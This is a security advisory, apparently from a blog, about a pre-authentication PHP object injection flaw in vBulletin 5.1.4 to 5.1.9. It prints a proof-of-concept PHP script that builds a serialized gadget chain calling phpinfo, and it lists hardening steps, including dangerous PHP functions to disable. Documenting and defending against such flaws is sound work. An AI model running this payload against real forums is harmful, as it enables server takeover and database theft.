PreAuth PHP Object Injection Critical Vulnerability in vBulletin Versions 5.1.4 to 5.1.9

vBulletin on 03 Nov 2015 released security patches. The vBulletin 5.1.4 to 5.1.9 is vulnerable to PHP Object injection, where attacker can take control of the website and dump the database of vBulletin forum.

It is found that vulnerability is released in the public. This vulnerability is very serious and easy to exploit to compromise the vBulletin forum server. The vBulletin main forum being defaced on Monday, by using this vulnerability.

We recommend to all vBulletin users to patch the PHP Object Injection vulnerability and harden the vBulletin server setup.

Technical Information

The decodeArguments Ajax API hook is vulnerable module of the vBulletin. As it is vulnerable to the PHP object injection, attacker will need to create the PHP Objects.

Following script is released to construct the Objects

<?php
class vB_Database {
       public $functions = array();

       public function __construct() 
       {
               $this->functions['free_result'] = 'phpinfo';
       }
}

class vB_dB_Result {
       protected $db;
       protected $recordset;

       public function __construct()
       {
               $this->db = new vB_Database();
               $this->recordset = 1;
       }
}

print urlencode(serialize(new vB_dB_Result())) . "\n";

Recommended Steps

1. Update vBulletin with given patch link
2. Change the default administrator username
3. Protect directories and files – Project administrator directory with .htaccess protection. For details on protection implementation click here
4. Disable Unneeded Functions & Classes e.g. : eval(),  system(), show_source, system, shell_exec, passthru,  exec,  phpinfo,  proc_open,  popen,  eval, and highlight_file
5. Turn off display_errors from PHP.ini
6. Limit Administrator Panel Access by allowing only trusted set of IP addresses
7. Configure open_basedir from PHP.ini

You can find more technical details about the vulnerability here